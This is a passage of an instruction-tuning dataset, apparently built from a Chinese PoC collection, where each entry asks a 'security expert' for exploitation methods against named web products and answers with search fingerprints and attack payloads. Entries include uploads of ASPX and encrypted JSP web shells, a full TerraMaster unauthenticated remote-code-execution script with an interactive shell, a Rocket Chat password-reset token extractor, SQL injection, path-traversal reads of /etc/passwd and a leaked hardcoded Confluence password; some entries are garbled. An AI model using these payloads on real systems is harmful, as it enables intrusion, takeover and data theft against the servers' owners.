boundary=62907949903a4c499178971c9dab4ad9\n\n--62907949903a4c499178971c9dab4ad9\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"abc.aspx\"\nContent-Type: image/jpeg\n\n<%@ Page Language=\"Jscript\"%><%Response.Write(FormsAuthentication.HashPasswordForStoringInConfigFile(\"abc\", \"MD5\").ToLower());eval(Request.Item[\"cmd\"],\"unsafe\");%>\n--62907949903a4c499178971c9dab4ad9--\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/银达汇智 智慧综合管理平台 FileUp.aspx 任意文件上传漏洞.md"}
    723. 

  723. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:eGroupWare spellchecker.php 远程命令执行漏洞\n漏洞描述:*eGroupWare*是一个多用户,在以PHP为基础的API上的定制集为基础开发的,以WEB为基础的工作件套装,其中 spellchecker.php 文件中存在命令执行漏洞\n影响版本:``` eGroupWare ```\n网络测绘:``` app=\"EGROUPWARE-产品\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"EGROUPWARE-产品\"\n2. /egroupware/phpgwapi/js/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php?spellchecker_lang=egroupware_spellchecker_cmd_exec.nasl%7C%7Cid%7C%7C\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/eGroupWare spellchecker.php 远程命令执行漏洞.md"}
    724. 

  724. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986\n漏洞描述:F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 近日,F5发布了F5 BIG-IQ/F5 BIG-IP 代码执行,代码执行的风险声明,F5安全公告更新了BIG-IP,BIG-IQ中的多个严重漏洞。建议广大用户及时将f5 big-iq,f5 big-ip升级到最新版本,避免遭到攻击。\n影响版本:``` F5 BIG-IP 16.x: 16.1.0.3 F5 BIG-IP 15.x: 15.1.0.4 F5 BIG-IP 14.x: 14.1.2.6 F5 BIG-IP 13.x: 13.1.3.4 F5 BIG-IP 12.x: 12.1.5.2 F5 BIG-IP 11.x: 11.6.5.2 ```\n网络测绘:``` icon_hash=\"-335242539\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-22986\n【POC利用方法】\n1. F5 BIG-IP 16.x: 16.1.0.3\nF5 BIG-IP 15.x: 15.1.0.4\nF5 BIG-IP 14.x: 14.1.2.6\nF5 BIG-IP 13.x: 13.1.3.4\nF5 BIG-IP 12.x: 12.1.5.2\nF5 BIG-IP 11.x: 11.6.5.2\n2. icon_hash=\"-335242539\"\n3. POST /mgmt/tm/util/bash HTTP/1.1\nHost: xxx.xxx.xxx.xxx:8443\nConnection: close\nContent-Length: 41\nCache-Control: max-age=0\nAuthorization: Basic YWRtaW46QVNhc1M=\nX-F5-Auth-Token: \nUpgrade-Insecure-Requests: 1\nContent-Type: application/json\n\n{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986.md"}
    725. 

  725. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Metersphere file 任意文件读取漏洞 CVE-2023-25573\n漏洞描述:MeterSphere 是一站式开源持续测试平台, 涵盖测试跟踪、接口测试、UI 测试和性能测试等功能,全面兼容 JMeter、Selenium 等主流开源标准。 Metersphere file 接口存在任意文件读取漏洞,攻击者通过接口可以获取敏感文件压缩包。\n影响版本:``` Metersphere <=2.6.2 ```\n网络测绘:``` body=\"Metersphere\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2023-25573\n【POC利用方法】\n1. Metersphere <=2.6.2\n2. body=\"Metersphere\"\n3. POST /api/jmeter/download/files\nContent-Type: application/json\n\n{\"reportId\":\"pass\",\"bodyFiles\":[{\"id\":\"aaa\",\"name\":\"/etc/passwd\"}]}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Metersphere file 任意文件读取漏洞 CVE-2023-25573.md"}
    726. 

  726. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:绿盟 BAS日志数据安全性分析系统 accountmanage 未授权访问漏洞\n漏洞描述:绿盟 BAS日志数据安全性分析系统存在未授权访问漏洞,通过漏洞可以添加任意账户登录平台获取敏感信息\n影响版本:``` 绿盟 BAS日志数据安全性分析系统 ```\n网络测绘:``` body=\"WebApi/encrypt/js-sha1/build/sha1.min.js\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 绿盟 BAS日志数据安全性分析系统\n2. body=\"WebApi/encrypt/js-sha1/build/sha1.min.js\"\n3. /accountmanage/index\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/绿盟 BAS日志数据安全性分析系统 accountmanage 未授权访问漏洞.md"}
    727. 

  727. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Joomla application 未授权访问漏洞 CVE-2023-23752\n漏洞描述:Joomla 存在未授权访问漏洞,攻击者通过覆盖 public 值绕过限制,访问部分API获取敏感数据\n影响版本:``` Joomla 4.0.0 - 4.2.7 ```\n网络测绘:``` app=\"Joomla\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2023-23752\n【POC利用方法】\n1. Joomla 4.0.0 - 4.2.7\n2. app=\"Joomla\"\n3. /api/index.php/v1/config/application?public=true\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Joomla application 未授权访问漏洞 CVE-2023-23752.md"}
    728. 

  728. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:360天擎 越权访问/数据库信息泄露\n漏洞描述:360天擎 存在未授权越权访问,造成敏感信息泄露\n影响版本:``` 天擎 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. GET /api/dbstat/gettablessize HTTP/1.1\n2. GET /api/dbstat/gettablessize HTTP/1.1\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/360天擎 gettablessize 数据库信息泄露漏洞.md"}
    729. 

  729. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:用友 畅捷通远程通 GNRemote.dll SQL注入漏洞\n漏洞描述:用友 畅捷通远程通 GNRemote.dll SQL注入漏洞,攻击者通过SQL注入可以获取服务器敏感信息或者使用万能密码登录设备\n影响版本:``` 用友 畅捷通远程通 ```\n网络测绘:``` body=\"远程通CHANJET_Remote\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. body=\"远程通CHANJET_Remote\"\n2. POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl\n\nusername=%22'%20or%201%3d1%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1\n3. username=%22'%20or%201%3d1%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/用友 畅捷通远程通 GNRemote.dll SQL注入漏洞.md"}
    730. 

  730. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:TerraMaster TOS RCE CVE-2020-28188\n漏洞描述:TerraMaster TOS 4.2.06 以下中 makecvs.php 存在任意文件写入,攻击者可以上传恶意文件控制服务器\n影响版本:``` TerraMaster TOS < 4.2.06 ```\n网络测绘:``` \"TerraMaster\" && header=\"TOS\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-28188\n【POC利用方法】\n1. TerraMaster TOS < 4.2.06\n2. \"TerraMaster\" && header=\"TOS\"\n3. # Exploit Title: TerraMaster TOS 4.2.06 - RCE (Unauthenticated)\n# Date: 12/12/2020\n# Exploit Author: IHTeam\n# Full Write-up: https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/\n# Vendor Homepage: https://www.terra-master.com/\n# Version: <= 4.2.06\n# Tested on: 4.1.30, 4.2.06\n\n#!/usr/bin/env python3\nimport argparse\nimport requests\nimport time\nimport sys\nimport urllib.parse\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nparser = argparse.ArgumentParser(description=\"TerraMaster TOS <= 4.2.06 Unauth RCE\")\nparser.add_argument('--url', action='store', dest='url', required=True, help=\"Full URL and port e.g.: http://192.168.1.111:8081/\")\nargs = parser.parse_args()\n\nurl = args.url\nheaders = {'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}\nepoch_time = int(time.time())\nshell_filename = \"debug\"+str(epoch_time)+\".php\"\n\ndef check_endpoint(url, headers):\n\tresponse = requests.get(url+'/version', headers=headers, verify=False)\n\tif response.status_code == 200:\n\t\tprint(\"[+] TerraMaster TOS version: \", str(response.content))\n\telse:\n\t\tprint(\"\\n[-] TerraMaster TOS response code: \", response.status_code)\n\t\tsys.exit()\n\t\t\ndef upload_shell(url, headers, shell_filename):\n\tpayload = \"http|echo \\\"<?php echo(passthru(\\\\$_GET['cmd']));?>\\\" >> /usr/www/\"+shell_filename+\" && chmod +x /usr/www/\"+shell_filename+\"||\"\n\tpayload = urllib.parse.quote(payload, safe='')\n\tprint(\"[/] Uploading shell...\")\n\tresponse = requests.get(url+'/include/makecvs.php?Event='+payload, headers=headers, verify=False)\n\ttime.sleep(1)\n\tresponse = requests.get(url+'/'+shell_filename+'?cmd=cat /etc/passwd', headers=headers, verify=False)\n\tif ('root:' in str(response.content, 'utf-8')):\n\t\tprint(\"[+] Upload succeeded\")\n\telse:\n\t\tprint(\"\\n[-] Error uploading shell: \", response.content)\n\t\tsys.exit()\n\ndef interactive_shell(url, headers, shell_filename, cmd):\n\tresponse = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(cmd, safe=''), headers=headers, verify=False)\n\tprint(str(response.text)+\"\\n\")\n\n\ndef delete_shell(url, headers, shell_filename):\n\tdelcmd = \"rm /usr/www/\"+shell_filename\n\tresponse = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(delcmd, safe=''), headers=headers, verify=False)\n\tprint(\"\\n[+] Shell deleted\")\n\nupload_shell(url, headers, shell_filename)\ntry:\n\twhile True:\n\t\tcmd = input(\"# \")\n\t\tinteractive_shell(url, headers, shell_filename, cmd)\nexcept:\n\tdelete_shell(url, headers, shell_filename)\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/TerraMaster TOS RCE CVE-2020-28188.md"}
    731. 

  731. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Atlassian Confluence OGNL表达式注入代码执行漏洞 CVE-2021-26084\n漏洞描述:Atlassian Confluence是企业广泛使用的wiki系统,其部分版本中存在OGNL表达式注入漏洞。攻击者可以通过这个漏洞,无需任何用户的情况下在目标Confluence中执行任意代码。 参考链接: - https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html - https://jira.atlassian.com/browse/CONFSERVER-67940 - https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md - https://github.com/h3v0x/CVE-2021-26084_Confluence\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-26084\n【POC利用方法】\n1. docker-compose up -d\n2. # 编码前\nqueryString='+{233*233}+'\n3. # 编码后\nqueryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Atlassian Confluence OGNL表达式注入代码执行漏洞 CVE-2021-26084.md"}
    732. 

  732. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Kibana 原型链污染导致任意代码执行漏洞 CVE-2019-7609\n漏洞描述:Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.15和6.6.1之前的版本中存在一处原型链污染漏洞,利用这个漏洞我们可以在目标服务器上执行任意JavaScript代码。 参考链接: - https://nvd.nist.gov/vuln/detail/CVE-2019-7609 - https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/ - https://slides.com/securitymb/prototype-pollution-in-kibana/#/4\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2019-7609\n【POC利用方法】\n1. sysctl -w vm.max_map_count=262144\n2. docker-compose up -d\n3. .es(*).props(label.__proto__.env.AAAA='require(\"child_process\").exec(\"/bin/touch /tmp/success\");process.exit()//')\n.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Kibana 原型链污染导致任意代码执行漏洞 CVE-2019-7609.md"}
    733. 

  733. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:PDF.js 任意 JavaScript 代码执行 CVE-2024-4367\n漏洞描述:PDF.js 是 Mozilla 推出的一款开源 PDF 文件阅读器。其 4.1.392 版本及以前,PDF.js 中存在一处 JavaScript 代码注入漏洞。 参考链接: - https://codeanlabs.com/blog/research/cve-2024-4367-arbitrary-js-execution-in-pdf-js/ - https://github.com/mozilla/pdf.js/archive/refs/tags/v4.1.392.zip\n影响版本:影响版本: ``` v4.1.392 (released April 11, 2024): 受影响 (release before this bug was fixed) v1.10.88 (released Oct 27, 2017): 受影响 (re-introduces the security vulnerability due to a typo fix) v1.4.20 (released Jan 27, 2016): 受影响 (release before the next release that accidentally fixed the vulnerable code) v0.8.1181 (released Apr 10, 2014): 受影响 (first public release of PDF.js) ``` 安全版本: ``` v4.2.67 (released April 29, 2024): 不受影响 (fixed) v1.9.426 (released Aug 15, 2017): 不受影响 (release before the next affected version) v1.5.188 (released Apr 21, 2016): 不受影响 (mitigated the security vulnerability by an accidental typo) ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2024-4367\n【POC利用方法】\n1. v4.1.392 (released April 11, 2024): 受影响 (release before this bug was fixed)\nv1.10.88 (released Oct 27, 2017): 受影响 (re-introduces the security vulnerability due to a typo fix)\nv1.4.20 (released Jan 27, 2016): 受影响 (release before the next release that accidentally fixed the vulnerable code)\nv0.8.1181 (released Apr 10, 2014): 受影响 (first public release of PDF.js)\n2. v4.2.67 (released April 29, 2024): 不受影响 (fixed)\nv1.9.426 (released Aug 15, 2017): 不受影响 (release before the next affected version)\nv1.5.188 (released Apr 21, 2016): 不受影响 (mitigated the security vulnerability by an accidental typo)\n3. docker compose up -d\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/PDF.js 任意 JavaScript 代码执行 CVE-2024-4367.md"}
    734. 

  734. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Jellyfin 任意文件读取漏洞 CVE-2021-21402\n漏洞描述:Jellyfin是一个免费软件媒体系统。在10.7.1版之前的Jellyfin中,带有某些终结点的精心设计的请求将允许从Jellyfin服务器的文件系统中读取任意文件。当Windows用作主机OS时,此问题更为普遍。暴露于公共Internet的服务器可能会受到威胁。在版本10.7.1中已修复此问题。解决方法是,用户可以通过在文件系统上实施严格的安全权限来限制某些访问,但是建议尽快进行更新。\n影响版本:``` Jellyfin < 10.7.1 ```\n网络测绘:``` title='Jellyfin' || body='http://jellyfin.media' ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-21402\n【POC利用方法】\n1. Jellyfin < 10.7.1\n2. title='Jellyfin' || body='http://jellyfin.media'\n3. // Can't require authentication just yet due to seeing some requests come from Chrome without full query string\n// [Authenticated] // [1]\n[HttpGet(\"Audio/{itemId}/hls/{segmentId}/stream.mp3\", Name = \"GetHlsAudioSegmentLegacyMp3\")]\n[HttpGet(\"Audio/{itemId}/hls/{segmentId}/stream.aac\", Name = \"GetHlsAudioSegmentLegacyAac\")]\n//...\npublic ActionResult GetHlsAudioSegmentLegacy([FromRoute, Required] string itemId, [FromRoute, Required] string segmentId)\n{\n    // TODO: Deprecate with new iOS app\n    var file = segmentId + Path.GetExtension(Request.Path); //[2]\n    file = Path.Combine(_serverConfigurationManager.GetTranscodePath(), file);\n\n    return FileStreamResponseHelpers.GetStaticFileResult(file, MimeTypes.GetMimeType(file)!, false, HttpContext);\n}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Jellyfin 任意文件读取漏洞 CVE-2021-21402.md"}
    735. 

  735. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Rocket Chat MongoDB 注入漏洞 CVE-2021-22911\n漏洞描述:Rocket Chat是一款基于Node.js、MongoDB的开源团队聊天工具。在其3.12.1~3.13.2版本中,存在一处MongoDB注入漏洞,利用这个漏洞,攻击者可以获取用户敏感信息,甚至在服务器上执行任意命令。 这个漏洞有两种攻击方式: - 未授权攻击者可以利用这个漏洞,获取任意普通用户的Password Reset Token,并通过这个Token修改其密码 - 普通用户可以利用这个漏洞,获取任意用户的任意信息 参考链接: - https://blog.sonarsource.com/nosql-injections-in-rocket-chat - https://www.exploit-db.com/exploits/50108 - https://github.com/CsEnox/CVE-2021-22911 - https://paper.seebug.org/1652/\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-22911\n【POC利用方法】\n1. docker-compose up -d\n2. import sys\nimport time\nimport string\nimport json\nimport requests\n\n\nguess = '-_' + string.digits + string.ascii_letters\nsession = requests.session()\nsession.headers = {\n    'Content-Type': 'application/json',\n}\n\n\ndef reset_password(target: str, email: str):\n    payload = {\n        'msg': 'method',\n        'method': 'sendForgotPasswordEmail',\n        'params': [email],\n    }\n\n    session.post(\n        f'{target}/api/v1/method.callAnon/sendForgotPasswordEmail',\n        json={'message': json.dumps(payload)},\n    )\n    sys.stdout.write(\"[+] Password Reset Email Sent\\n\")\n    sys.stdout.flush()\n\n\ndef inject_token(target: str):\n    payload = {\n        'msg': 'method',\n        'method': 'getPasswordPolicy',\n        'params': [\n            {\n                'token': {'$regex': '^'}\n            }\n        ],\n    }\n    for i in range(43):\n        current = payload['params'][0]['token']['$regex']\n        sys.stdout.write(f'[*] Guess No.{i + 1} character: ')\n        for ch in guess:\n            payload['params'][0]['token']['$regex'] = current + ch\n            response = session.post(\n                f'{target}/api/v1/method.callAnon/getPasswordPolicy',\n                json={'message': json.dumps(payload)},\n            )\n            if b'Meteor.Error' not in response.content:\n                sys.stdout.write(f\"\\n[+] Current token is {payload['params'][0]['token']['$regex'][1:]}\\n\")\n                sys.stdout.flush()\n                break\n            else:\n                sys.stdout.write('.')\n                sys.stdout.flush()\n\n            time.sleep(1.5)\n\n\nif __name__ == '__main__':\n    target = sys.argv[1]\n    reset_password(target, sys.argv[2])\n    inject_token(target)\n3. def reset_password(target: str, email: str):\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Rocket Chat MongoDB 注入漏洞 CVE-2021-22911.md"}
    736. 

  736. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Gitea 1.4.0 目录穿越导致命令执行漏洞\n漏洞描述:Gitea是从gogs衍生出的一个开源项目,是一个类似于Github、Gitlab的多用户Git仓库管理平台。其1.4.0版本中有一处逻辑错误,导致未授权用户可以穿越目录,读写任意文件,最终导致执行任意命令。 参考链接: - https://security.szurek.pl/gitea-1-4-0-unauthenticated-rce.html - https://www.leavesongs.com/PENETRATION/gitea-remote-command-execution.html\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. POST /test/repo.git/info/lfs/objects HTTP/1.1\nHost: your-vps-ip:3000\nAccept-Encoding: gzip, deflate\nAccept: application/vnd.git-lfs+json\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\nContent-Type: application/json\nContent-Length: 153\n\n{\n    \"Oid\": \"....../../../etc/passwd\",\n    \"Size\": 1000000,\n    \"User\" : \"a\",\n    \"Password\" : \"a\",\n    \"Repo\" : \"a\",\n    \"Authorization\" : \"a\"\n}\n3. GET /test/repo.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth HTTP/1.1\nHost: your-vps-ip:3000\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Gitea 1.4.0 目录穿越导致命令执行漏洞.md"}
    737. 

  737. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Webmin update.cgi 后台远程命令执行漏洞 CVE-2022-0824\n漏洞描述:Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.990之前版本存在安全漏洞,该漏洞源于软件中存在不正确的访问控制,攻击者可以利用该漏洞实现远程代码执行\n影响版本:``` Webmin < 1.990 ```\n网络测绘:``` app=\"webmin\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2022-0824\n【POC利用方法】\n1. Webmin < 1.990\n2. app=\"webmin\"\n3. POST /package-updates/update.cgi HTTP/1.1\nCookie: sid=882af4543067bc6214d2c769325f3b2f\nReferer: http:///package-updates/update.cgi?xnavigation=1\n\nmode=new&search=ssh&redir=&redirdesc=&u=0;id;&confirm=Install+Now\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Webmin update.cgi 后台远程命令执行漏洞 CVE-2022-0824.md"}
    738. 

  738. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Crawlab users 任意用户添加漏洞\n漏洞描述:Crawlab users 的 api 存在任意用户添加,且添加为未授权接口,可通过添加后在后台进一步攻击\n影响版本:``` Crawlab v0.0.1 ```\n网络测绘:``` title=\"Crawlab\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. Crawlab v0.0.1\n2. title=\"Crawlab\"\n3. anonymousGrou 中为匿名可调用方法\nauthGroup\t  中为认证可调用方法\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Crawlab users 任意用户添加漏洞.md"}
    739. 

  739. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:辰信领创 辰信景云终端安全管理系统 login SQL注入漏洞\n漏洞描述:辰信领创 辰信景云终端安全管理系统 login存在 SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息\n影响版本:辰信领创 辰信景云终端安全管理系统\n网络测绘:``` \"辰信景云终端安全管理系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. \"辰信景云终端安全管理系统\"\n2. POST /api/user/login\n\ncaptcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='\n3. POST /api/user/login\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/辰信领创 辰信景云终端安全管理系统 login SQL注入漏洞.md"}
    740. 

  740. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Adobe ColdFusion upload.cfm 任意文件上传漏洞 CVE-2018-15961\n漏洞描述:Adobe ColdFusion存在任意文件上传漏洞,通过漏洞攻击者可上传任意文件控制服务器\n影响版本:``` Adobe ColdFusion ```\n网络测绘:``` app=\"Adobe-ColdFusion\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2018-15961\n【POC利用方法】\n1. Adobe ColdFusion\n2. app=\"Adobe-ColdFusion\"\n3. POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1\nHost: \nUser-Agent: Go-http-client/1.1\nContent-Length: 918\nContent-Type: multipart/form-data; boundary=e9fb732e96144291860c4d742145cdabf98a4ec5cbe2a91aec6dc17461a0\nAccept-Encoding: gzip\n\n--e9fb732e96144291860c4d742145cdabf98a4ec5cbe2a91aec6dc17461a0\nContent-Disposition: form-data; name=\"file\"; filename=\"b79f4282c451e975c357d9616acea7ba.jsp\"\nContent-Type: application/octet-stream\n\n<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>\n--e9fb732e96144291860c4d742145cdabf98a4ec5cbe2a91aec6dc17461a0\nContent-Disposition: form-data; name=\"path\"\n\npath\n--e9fb732e96144291860c4d742145cdabf98a4ec5cbe2a91aec6dc17461a0--\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Adobe ColdFusion upload.cfm 任意文件上传漏洞 CVE-2018-15961.md"}
    741. 

  741. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Atlassian Questions For Confluence 身份认证绕过漏洞CVE-2022-26138\n漏洞描述:Atlassian官方发布了2022年7月的安全更新,其中涉及到Confluence Server的多个漏洞,其中CVE-2022-26138为一个硬编码漏洞。 当Confluence Server或Data Center上的Questions for Confluence app启用时,它会创建一个名为`disabledsystemuser`的Confluence用户帐户。此帐户旨在帮助将数据从应用程序迁移到 Confluence Cloud的管理员账号中。该帐户通过使用**硬编码密码**创建并添加到confluence-users组中,在默认情况下允许查看和编辑 Confluence 中的所有非受限页面。 未经身份验证攻击者可以利用所知的硬编码密码登录Confluence并访问该组有权限访问的所有页面。\n影响版本:``` Questions for Confluence app == 2.7.34 Questions for Confluence app == 2.7.35 Questions for Confluence app == 3.0.2 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2022-26138\n【POC利用方法】\n1. Questions for Confluence app == 2.7.34\nQuestions for Confluence app == 2.7.35\nQuestions for Confluence app == 3.0.2\n2. https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/confluence-questions-3.0.2.jar\n3. predefined.user.username=disabledsystemuser\npredefined.user.password=disabled1system1user6708\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Atlassian Questions For Confluence 身份认证绕过漏洞 CVE-2022-26138.md"}
    742. 

  742. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:众望网络 微议管理系统 后台updatefile.html 任意文件上传漏洞\n漏洞描述:众望网络 微议管理系统 后台updatefile.html页面任意文件上传漏洞,攻击者通过漏洞可以上传恶意文件控制服务器\n影响版本:``` 众望网络 微议管理系统 ```\n网络测绘:``` \"微议管理系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 众望网络 微议管理系统\n2. /Updatefiles/文件名.php\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/众望网络 微议管理系统 后台updatefile.html 任意文件上传漏洞.md"}
    743. 

  743. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224\n漏洞描述:浪潮服务器群集管理系统存在危险字符未过滤,导致远程命令执行\n影响版本:``` 浪潮ClusterEngineV4.0 ```\n网络测绘:``` title=\"TSCEV4.0\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-21224\n【POC利用方法】\n1. 浪潮ClusterEngineV4.0\n2. title=\"TSCEV4.0\"\n3. var1 = `grep xxxx` \nvar2 = $(python -c \"from crypt import crypt;print crypt('$username','$1$$var1')\")\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224.md"}
    744. 

